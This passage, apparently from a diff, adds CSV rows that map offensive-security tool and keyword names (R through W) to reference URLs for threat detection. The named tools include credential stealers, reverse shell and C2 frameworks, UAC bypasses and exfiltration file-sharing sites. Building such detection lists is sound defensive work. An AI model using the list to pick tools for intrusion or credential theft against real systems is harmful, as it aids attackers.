VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"RDPassSpray","https://github.com/xFreed0m/RDPassSpray" +"RDPCredentialStealer","https://github.com/S12cybersecurity/RDPCredentialStealer" +"RDPHijack-BOF","https://github.com/netero1010/RDPHijack-BOF" +"RDPInception","https://github.com/mdsecactivebreach/RDPInception" +"rdpscraper","https://github.com/x90skysn3k/rdpscraper" +"RDPSpray","https://github.com/dafthack/RDPSpray" +"RdpThief","https://github.com/0x09AL/RdpThief" +"reaper","https://github.com/MrEmpy/Reaper" +"reapoc","https://github.com/cckuailong/reapoc" +"REC2 ","https://github.com/g0h4n/REC2" +"recon-archy","https://github.com/shadawck/recon-archy" +"RecycledInjector","https://github.com/florylsk/RecycledInjector" +"Red Panda VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"red_hawk","https://github.com/Tuhinshubhra/RED_HAWK" +"Red-Baron","https://github.com/byt3bl33d3r/Red-Baron" +"RedGuard","https://github.com/wikiZ/RedGuard" +"redhuntlabs","https://github.com/redhuntlabs" +"RedHunt-OS","https://github.com/redhuntlabs/RedHunt-OS" +"redis-rce","https://github.com/Ridter/redis-rce" +"RedPeanut","https://github.com/b4rtik/RedPeanut" +"RedPersist","https://github.com/mertdas/RedPersist" +"red-python-scripts","https://github.com/davidbombal/red-python-scripts" +"RedTeam_toolkit","https://github.com/signorrayan/RedTeam_toolkit" +"RedTeam_toolkit","https://github.com/MayankPandey01/Jira-Lens" +"Red-Teaming-Toolkit","https://github.com/infosecn1nja/Red-Teaming-Toolkit" +"red-team-scripts","https://github.com/threatexpress/red-team-scripts" +"ReelPhish","https://github.com/fireeye/ReelPhish" +"ReflectiveNtdll","https://github.com/reveng007/ReflectiveNtdll" +"RefleXXion","https://github.com/hlldz/RefleXXion" +"reg","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"reg","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat" +"reg","N/A" +"reg","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md" +"reg","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz" +"reg","https://github.com/ice-wzl/wmiexec2" +"reg","https://github.com/Pennyw0rth/NetExec" +"reGeorg","https://github.com/sensepost/reGeorg" +"regreeper","https://github.com/tccontre/Reg-Restore-Persistence-Mole" +"remote-method-guesser","https://github.com/qtc-de/remote-method-guesser" +"ren","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"rengine","https://github.com/yogeshojha/rengine" +"responder","https://github.com/SpiderLabs/Responder" +"reverse-shell-generator","https://github.com/0dayCTF/reverse-shell-generator" +"ridrelay","https://github.com/skorov/ridrelay" +"rmmod","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml" +"ROADtools","https://github.com/dirkjanm/ROADtools" +"Rock-ON","https://github.com/SilverPoision/Rock-ON" +"RoguePotato","https://github.com/antonioCoco/RoguePotato" +"RogueSploit","https://github.com/h0nus/RogueSploit" +"ropfuscator","https://github.com/ropfuscator/ropfuscator" +"routerpasswords.com","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"routerscan","https://en.kali.tools/?p=244" +"routersploit","https://github.com/threat9/routersploit" +"rpcclient","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html" +"rpivot","https://github.com/klsecservices/rpivot" +"rsg","https://github.com/mthbernardes/rsg" +"rshijack","https://github.com/kpcyrd/rshijack" +"rsocx","https://github.com/b23r0/rsocx" +"rsync","https://attack.mitre.org/techniques/T1105/" +"Rubeus","https://github.com/GhostPack/Rubeus" +"ruby","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Rudrastra","https://github.com/SxNade/Rudrastra" +"ruler","https://github.com/sensepost/ruler" +"RunasCs","https://github.com/antonioCoco/RunasCs/" +"RunasCs","https://github.com/antonioCoco/RunasCs" +"RunAsWinTcb","https://github.com/tastypepperoni/RunAsWinTcb" +"rundll32","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" +"rundll32","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence" +"RuralBishop","https://github.com/rasta-mouse/RuralBishop" +"rustcat","https://github.com/robiot/rustcat" +"RustHound","https://github.com/OPENCYBER-FR/RustHound" +"RusVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"rwxfinder","https://github.com/pwnsauc3/RWXFinder" +"S3Scanner","https://github.com/sa7mon/S3Scanner" +"S4UTomato","https://github.com/wh0amitz/S4UTomato" +"SaferVPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"SafetyKatz","https://github.com/GhostPack/SafetyKatz" +"Salsa-tools","https://github.com/Hackplayers/Salsa-tools" +"samba","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html" +"samdump","https://github.com/nyxgeek/classic_hacking_tools" +"samdump2","https://salsa.debian.org/pkg-security-team/samdump2" +"SamDumpCable","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable" +"sam-the-admin","https://github.com/WazeHell/sam-the-admin/tree/main/utils" +"SAP_GW_RCE_exploit","https://github.com/chipik/SAP_GW_RCE_exploit" +"sc","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/" +"scan4all","https://github.com/hktalent/scan4all" +"scanless","https://github.com/vesche/scanless" +"Scanners-Box","https://github.com/We5ter/Scanners-Box" +"ScareCrow","https://github.com/optiv/ScareCrow" +"sccmdecryptpoc","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1" +"sccmhunter","https://github.com/garrettfoster13/sccmhunter" +"ScheduleRunner","https://github.com/netero1010/ScheduleRunner" +"schtasks","N/A" +"SCMUACBypass","https://github.com/rasta-mouse/SCMUACBypass" +"scp","https://attack.mitre.org/techniques/T1105/" +"ScreenConnect","screenconnect.com" +"ScreenConnect","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/" +"ScriptSentry","https://github.com/techspence/ScriptSentry" +"scshell","https://github.com/Mr-Un1k0d3r/SCShell" +"seatbelt","https://github.com/GhostPack/Seatbelt" +"SecLists","https://github.com/danielmiessler/SecLists" +"secretfinder","https://github.com/m4ll0k/SecretFinder" +"securesocketfunneling","https://securesocketfunneling.github.io/ssf/#home" +"security-onion","https://github.com/Security-Onion-Solutions/security-onion" +"sed","N/A" +"SeeYouCM-Thief","https://github.com/trustedsec/SeeYouCM-Thief" +"SeManageVolumeExploit","https://github.com/CsEnox/SeManageVolumeExploit" +"sendspace.com","https://twitter.com/mthcht/status/1660953897622544384" +"SessionGopher","https://github.com/Arvanaghi/SessionGopher" +"SessionSearcher","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher" +"Seth","https://github.com/SySS-Research/Seth" +"SetProcessInjection","https://github.com/OtterHacker/SetProcessInjection" +"SetupVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"sftp","https://attack.mitre.org/techniques/T1105/" +"ShadowForgeC2","https://github.com/0xEr3bus/ShadowForgeC2" +"ShadowSpray","https://github.com/ShorSec/ShadowSpray" +"SharpAzbelt","https://github.com/redskal/SharpAzbelt" +"SharpBlackout","https://github.com/dmcxblue/SharpBlackout" +"SharpBlock","https://github.com/CCob/SharpBlock" +"SharpC2","https://github.com/rasta-mouse/SharpC2" +"SharpChromium","https://github.com/djhohnstein/SharpChromium" +"SharpClipHistory","https://github.com/FSecureLABS/SharpClipHistory" +"SharpCloud","https://github.com/chrismaddalena/SharpCloud" +"sharpcollection","https://github.com/Flangvik/SharpCollection" +"SharpCookieMonster","https://github.com/m0rv4i/SharpCookieMonster" +"SharpDllProxy","https://github.com/Flangvik/SharpDllProxy" +"SharpDomainSpray","https://github.com/HunnicCyber/SharpDomainSpray" +"SharpDoor","https://github.com/infosecn1nja/SharpDoor" +"SharpDPAPI","https://github.com/GhostPack/SharpDPAPI" +"SharpDXWebcam","https://github.com/snovvcrash/SharpDXWebcam" +"SharpEfsPotato","https://github.com/bugch3ck/SharpEfsPotato" +"SharPersist","https://github.com/fireeye/SharPersist" +"SharpExfiltrate","https://github.com/Flangvik/SharpExfiltrate" +"SharpFtpC2","https://github.com/DarkCoderSc/SharpFtpC2" +"SharpGmailC2","https://github.com/reveng007/SharpGmailC2" +"SharpGPOAbuse","https://github.com/FSecureLABS/SharpGPOAbuse" +"SharpHide","https://github.com/outflanknl/SharpHide" +"sharphound","https://github.com/BloodHoundAD/SharpHound" +"SharpLAPS","https://github.com/swisskyrepo/SharpLAPS" +"SharpLDAP","https://github.com/mertdas/SharpLDAP" +"SharpLdapRelayScan","https://github.com/klezVirus/SharpLdapRelayScan" +"SharpNoPSExec","https://github.com/juliourena/SharpNoPSExec" +"SharpPack","https://github.com/mdsecactivebreach/SharpPack" +"SharpPrintNightmare","https://github.com/cube0x0/CVE-2021-1675" +"SharpRDP","https://github.com/0xthirteen/SharpRDP" +"SharpRDPHijack","https://github.com/bohops/SharpRDPHijack" +"SharpSCCM","https://github.com/Mayyhem/SharpSCCM/" +"SharpShellPipe","https://github.com/DarkCoderSc/SharpShellPipe" +"SharpShooter","https://github.com/mdsecactivebreach/SharpShooter" +"SharpSocks","https://github.com/nettitude/SharpSocks" +"SharpSploit","https://github.com/cobbr/SharpSploit" +"SharpSpray","https://github.com/jnqpblc/SharpSpray" +"SharpSQLPwn","https://github.com/lefayjey/SharpSQLPwn" +"SharpStay","https://github.com/0xthirteen/SharpStay" +"Sharp-Suite","https://github.com/FuzzySecurity/Sharp-Suite" +"SharpSword","https://github.com/OG-Sadpanda/SharpSword" +"SharpSystemTriggers","https://github.com/cube0x0/SharpSystemTriggers" +"SharpTerminator","https://github.com/mertdas/SharpTerminator" +"SharpToken","https://github.com/BeichenDream/SharpToken" +"SharpUnhooker","https://github.com/GetRektBoy724/SharpUnhooker" +"SharpUp","https://github.com/GhostPack/SharpUp" +"SharpView","https://github.com/tevora-threat/SharpView/" +"SharpWSUS","https://github.com/nettitude/SharpWSUS" +"SharPyShell","https://github.com/antonioCoco/SharPyShell" +"shell","N/A" +"shell","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml" +"shell","https://attack.mitre.org/techniques/T1562/001/" +"Shell3er","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1" +"Shellcode-Downloader-CreateThread-Execution","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution" +"Shellcode-Hide","https://github.com/TheD1rkMtr/Shellcode-Hide" +"Shellcode-Loader","https://github.com/ReversingID/Shellcode-Loader" +"shellcodetester","https://github.com/helviojunior/shellcodetester" +"ShellGhost","https://github.com/lem0nSec/ShellGhost" +"ShellPop","https://github.com/0x00-0x00/ShellPop" +"shhmon","https://github.com/matterpreter/Shhmon" +"shodan.io","https://www.shodan.io/" +"shred","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml" +"ShuckNT","https://github.com/yanncam/ShuckNT" +"SigPloit","https://github.com/SigPloiter/SigPloit" +"SilentHound","https://github.com/layer8secure/SilentHound" +"SilentMoonwalk","https://github.com/klezVirus/SilentMoonwalk" +"silenttrinity","https://github.com/byt3bl33d3r/SILENTTRINITY" +"SillyRAT","https://github.com/hash3liZer/SillyRAT" +"simplehttpserver","https://docs.python.org/2/library/simplehttpserver.html" +"Simple-Reverse-Shell","https://github.com/tihanyin/Simple-Reverse-Shell/" +"SimplyEmail","https://github.com/SimplySecurity/SimplyEmail" +"Sitadel","https://github.com/shenril/Sitadel" +"skymen.info","https://www.skymem.info" +"Slackor","https://github.com/Coalfire-Research/Slackor" +"SlinkyCat","https://github.com/LaresLLC/SlinkyCat" +"sliver","https://github.com/trustedsec/SliverKeylogger" +"sliver","https://github.com/BishopFox/sliver" +"SlowLoris","https://github.com/gkbrk/slowloris" +"SmashedPotato","https://github.com/Cn33liz/SmashedPotato" +"smbcrawler","https://github.com/SySS-Research/smbcrawler" +"SMBeagle","https://github.com/punk-security/SMBeagle" +"SMBetray","https://github.com/quickbreach/SMBetray" +"SMBGhost","https://github.com/ollypwn/SMBGhost" +"SMBGhost_RCE_PoC","https://github.com/chompie1337/SMBGhost_RCE_PoC" +"smbmap","https://github.com/ShawnDEvans/smbmap" +"smb-reverse-shell","https://github.com/r1cksec/smb-reverse-shell" +"smb-scanner","https://github.com/TechnicalMujeeb/smb-scanner" +"SMBSR","https://github.com/oldboy21/SMBSR" +"SMShell","https://github.com/persistent-security/SMShell" +"smtp-user-enum","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum" +"smuggler.py","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py" +"Sn1per","https://github.com/1N3/Sn1per" +"Snaffler","https://github.com/SnaffCon/Snaffler" +"SnaffPoint","https://github.com/nheiniger/SnaffPoint" +"snallygaster","https://github.com/hannob/snallygaster" +"SniffAir","https://github.com/Tylous/SniffAir" +"sniffer","https://github.com/chenjiandongx/sniffer" +"sniffglue","https://github.com/kpcyrd/sniffglue" +"snmpcheck","http://www.nothink.org/codes/snmpcheck/index.php" +"snmpwalk","https://wiki.debian.org/SNMP" +"snmpwn","https://github.com/hatlord/snmpwn" +"socat","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets" +"socat","N/A" +"socat","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"socat","https://github.com/craSH/socat" +"socat","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Social VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"SocialBox-Termux","https://github.com/umeshshinde19/instainsane" +"SocialBox-Termux","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl" +"SocialBox-Termux","https://github.com/samsesh/SocialBox-Termux" +"SocialBox-Termux","https://github.com/Ha3MrX/Gemail-Hack" +"SocialBox-Termux","https://github.com/samsesh/insta-bf" +"social-engineer-toolkit","https://github.com/trustedsec/social-engineer-toolkit" +"SocialPwned","https://github.com/MrTuxx/SocialPwned" +"softperfect networkscanner","https://www.softperfect.com/products/networkscanner/" +"Soul VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"SpaceRunner","https://github.com/Mr-B0b/SpaceRunner" +"SpamChannel","https://github.com/byt3bl33d3r/SpamChannel" +"Spartacus","https://github.com/Accenture/Spartacus" +"spellbound","https://github.com/mhuzaifi0604/spellbound" +"spiderfoot","https://www.spiderfoot.net/" +"Splashtop","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/" +"SplunkWhisperer2","https://github.com/cnotin/SplunkWhisperer2" +"SpookFlare","https://github.com/hlldz/SpookFlare" +"spoolsploit","https://github.com/BeetleChunks/SpoolSploit" +"Spray365","https://github.com/MarkoH17/Spray365" +"sprayhound","https://github.com/Hackndo/sprayhound" +"SprayingToolkit","https://github.com/byt3bl33d3r/SprayingToolkit" +"spraykatz","https://github.com/aas-n/spraykatz" +"Spring4Shell","https://github.com/reznok/Spring4Shell-POC" +"Spring4Shell","https://github.com/TheGejr/SpringShell" +"Spring4Shell","https://github.com/BobTheShoplifter/Spring4Shell-POC" +"Spring4Shell","https://github.com/DDuarte/springshell-rce-poc" +"SpringCore0day","https://github.com/craig/SpringCore0day" +"spring-core-rce","https://github.com/Mr-xn/spring-core-rce" +"sqli-labs","https://github.com/Audi-1/sqli-labs" +"sqlipy","https://github.com/codewatchorg/sqlipy" +"SQLiScanner","https://github.com/0xbug/SQLiScanner" +"sqlmap","https://github.com/sqlmapproject/sqlmap" +"SQLmate","https://github.com/s0md3v/sqlmate" +"sqlninja","http://sqlninja.sourceforge.net/" +"SQLRecon","https://github.com/skahwah/SQLRecon" +"sRDI","https://github.com/monoxgas/sRDI" +"ss","N/A" +"ssfd","https://github.com/securesocketfunneling/ssf" +"ssh","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml" +"sshame","https://github.com/HynekPetrak/sshame" +"ssh-auditor","https://github.com/ncsa/ssh-auditor" +"sshLooterC","https://github.com/mthbernardes/sshLooterC" +"ssh-mitm","https://github.com/jtesta/ssh-mitm" +"SSH-PuTTY-login-bruteforcer","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer" +"sslip.io","https://github.com/cunnie/sslip.io" +"sslstrip","https://github.com/moxie0/sslstrip" +"SspiUacBypass","https://github.com/antonioCoco/SspiUacBypass" +"SSRFmap","https://github.com/swisskyrepo/SSRFmap" +"StackCrypt","https://github.com/TheD1rkMtr/StackCrypt" +"StarFighters","https://github.com/Cn33liz/StarFighters" +"Starkiller","https://github.com/BC-SECURITY/Starkiller" +"statistically-likely-usernames","https://github.com/insidetrust/statistically-likely-usernames" +"StayKit","https://github.com/0xthirteen/StayKit" +"Sticky-Keys-Slayer","https://github.com/linuz/Sticky-Keys-Slayer" +"Striker","https://github.com/s0md3v/Striker" +"Striker","https://github.com/4g3nt47/Striker" +"subbrute","https://github.com/TheRook/subbrute" +"subfinder","https://github.com/subfinder/subfinder" +"Sublist3r","https://github.com/aboul3la/Sublist3r" +"Suborner","https://github.com/r4wd3r/Suborner" +"sudo","N/A" +"sudo","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"sudo_inject","https://github.com/nongiach/sudo_inject" +"SUDO_KILLER","https://github.com/TH3xACE/SUDO_KILLER" +"sudoers","N/A" +"Sudomy","https://github.com/screetsec/Vegile" +"Sudomy","https://github.com/screetsec/Sudomy" +"sudoSnatch","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch" +"SUID3NUM","https://github.com/Anon-Exploiter/SUID3NUM" +"Supernova","https://github.com/nickvourd/Supernova" +"supershell","https://github.com/tdragon6/Supershell" +"Surf VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"sVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"SwampThing","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing" +"Synergy-httpx","https://github.com/t3l3machus/Synergy-httpx" +"sysctl","https://github.com/bdamele/icmpsh" +"SysJoker","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/" +"sysmonquiet","https://github.com/ScriptIdiot/SysmonQuiet" +"systemctl","https://attack.mitre.org/techniques/T1562/001/" +"SysWhispers3","https://github.com/klezVirus/SysWhispers3" +"t14m4t","https://github.com/MS-WEB-BN/t14m4t" +"TakeMyRDP","https://github.com/TheD1rkMtr/TakeMyRDP" +"TakeMyRDP","https://github.com/nocerainfosec/TakeMyRDP2.0" +"takeown","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"takeown","https://github.com/ice-wzl/wmiexec2" +"targetedKerberoast","https://github.com/ShutdownRepo/targetedKerberoast" +"tasklist","https://github.com/ice-wzl/wmiexec2" +"tcpdump","http://www.tcpdump.org/" +"tcpreplay","https://tcpreplay.appneta.com/" +"teamsphisher","https://github.com/Octoberfest7/TeamsPhisher" +"teamstracker","https://github.com/nyxgeek/teamstracker" +"TelegramRAT","https://github.com/machine1337/TelegramRAT" +"telnet","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"telnet","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_apt_equationgroup_lnx.yml" +"temp.sh","https://twitter.com/mthcht/status/1660953897622544384" +"tempsend.com","https://twitter.com/mthcht/status/1660953897622544384" +"tetanus","https://github.com/MythicAgents/tetanus" +"textbin.net","textbin.net" +"TGSThief","https://github.com/MzHmO/TGSThief" +"thc-hydra","https://github.com/vanhauser-thc/thc-hydra" +"the-backdoor-factory","https://github.com/secretsquirrel/the-backdoor-factory" +"TheFatRat","https://github.com/Screetsec/TheFatRat" +"theHarvester","https://github.com/laramies/theHarvester" +"themebleed","https://github.com/gabe-k/themebleed" +"ThisIsNotRat","https://github.com/RealBey/ThisIsNotRat" +"thoth","https://github.com/r1cksec/thoth" +"ThreadlessInject","https://github.com/CCob/ThreadlessInject" +"ThreatCheck","https://github.com/rasta-mouse/ThreatCheck" +"Thunder Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ThunderDNS","https://github.com/fbkcs/ThunderDNS" +"ThunderShell","https://github.com/Mr-Un1k0d3r/ThunderShell" +"Timeroast","https://github.com/SecuraBV/Timeroast" +"tir_blanc_holiseum","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware" +"tmpfiles.org","N/A" +"tmpwatch","https://linux.die.net/man/8/tmpwatch" +"TokenTactics","https://github.com/rvrsh3ll/TokenTactics" +"Tokenvator","https://github.com/0xbadjuju/Tokenvator" +"Tool-PassView","https://www.nirsoft.net/password_recovery_tools.html" +"Tool-X","https://github.com/rajkumardusad/Tool-X" +"Tor","https://github.com/r0oth3x49/Tor" +"torproject","torproject.org" +"TorPylle","https://github.com/cea-sec/TorPylle" +"touch","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml" +"Touch VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"tplmap","https://github.com/epinna/tplmap" +"trackerjacker","https://github.com/calebmadrigal/trackerjacker" +"traitor","https://github.com/liamg/traitor" +"transfer.sh","https://twitter.com/mthcht/status/1660953897622544384" +"transfert-my-files.com","https://twitter.com/mthcht/status/1660953897622544384" +"translate.goog","https://*-com.translate.goog/*" +"Trellonet Trellonet","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"trevorc2","https://github.com/trustedsec/trevorc2" +"TREVORspray","https://github.com/blacklanternsecurity/TREVORspray" +"tricky.lnk","https://github.com/xillwillx/tricky.lnk" +"truffleHog","https://github.com/dxa4481/truffleHog" +"TunnelBear VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Tunnello VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Turbo VPN for PC","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"twittor","https://github.com/PaulSec/twittor" +"UACME","https://github.com/hfiref0x/UACME" +"udmp-parser","https://github.com/0vercl0k/udmp-parser" +"UFONet","https://github.com/epsylon/ufonet" +"Ultrareach VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Unblock Websites","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"unDefender","https://github.com/APTortellini/unDefender" +"undertheradar","https://github.com/g3tsyst3m/undertheradar" +"UnhookingPatch","https://github.com/TheD1rkMtr/UnhookingPatch" +"UniByAv","https://github.com/Mr-Un1k0d3r/UniByAv" +"unicorn","https://github.com/trustedsec/unicorn" +"UniversalDVC","https://github.com/earthquake/UniversalDVC" +"Unlimited VPN & Proxy by ibVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"UnquotedPath","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath" +"unset","N/A" +"unset","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger" +"unshackle","https://github.com/Fadi002/unshackle" +"unshadow","N/A" +"updog","https://github.com/sc0tfree/updog" +"Upnet","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Urban Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Urban Shield","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"usbmon","https://www.kernel.org/doc/Documentation/usb/usbmon.txt" +"usbpcap","https://github.com/s-h-3-l-l/katoolin3" +"UserEnum","https://github.com/sensepost/UserEnum" +"username-anarchy","https://github.com/urbanadventurer/username-anarchy" +"UsoDllLoader","https://github.com/itm4n/UsoDllLoader" +"utorrent","https[://]www[.]utorrent[.]com/intl/fr/" +"uVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"V3n0M-Scanner","https://github.com/v3n0m-Scanner/V3n0M-Scanner" +"Vajra","https://github.com/TROUBLE-1/Vajra" +"vbad","https://github.com/Pepitoh/Vbad" +"VBA-RunPE","https://github.com/itm4n/VBA-RunPE" +"vcsmap","https://github.com/melvinsh/vcsmap" +"Veee","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"venom","https://github.com/r00t-3xp10it/venom" +"Villain","https://github.com/t3l3machus/Villain" +"viperc2","https://github.com/FunnyWolf/viperpython" +"viperc2","https://github.com/FunnyWolf/vipermsf" +"VirtualShield VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VirusTotalC2","https://github.com/RATandC2/VirusTotalC2" +"vncpwdump","https://www.codebus.net/d-2v0u.html" +"vncviewer","N/A" +"VPN Free","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Master","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Professional","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN PROXY MASTER","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Unlimited Free","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN.AC","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN-free.pro","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPNMatic","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPNPivot","https://github.com/0x36/VPNPivot" +"vRealizeLogInsightRCE","https://github.com/horizon3ai/vRealizeLogInsightRCE" +"vscode","https://twitter.com/code/status/1699869087071899669" +"vscode","https://badoption.eu/blog/2023/01/31/code_c2.html" +"vsftpd","https://github.com/dagwieers/vsftpd/" +"vssadmin","N/A" +"vssadmin","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"Vulmap","https://github.com/vulmon/Vulmap" +"w3af","https://w3af.org/" +"Wachee VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"WAF-bypass-Cheat-Sheet","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" +"wafw00f","https://github.com/EnableSecurity/wafw00f" +"wapiti","https://github.com/wapiti-scanner/wapiti" +"warberry","https://github.com/secgroundzero/warberry" +"wbadmin","N/A" +"wce","https://www.kali.org/tools/wce/" +"WDExtract","https://github.com/hfiref0x/WDExtract/" +"weakpass","https://github.com/zzzteph/weakpass" 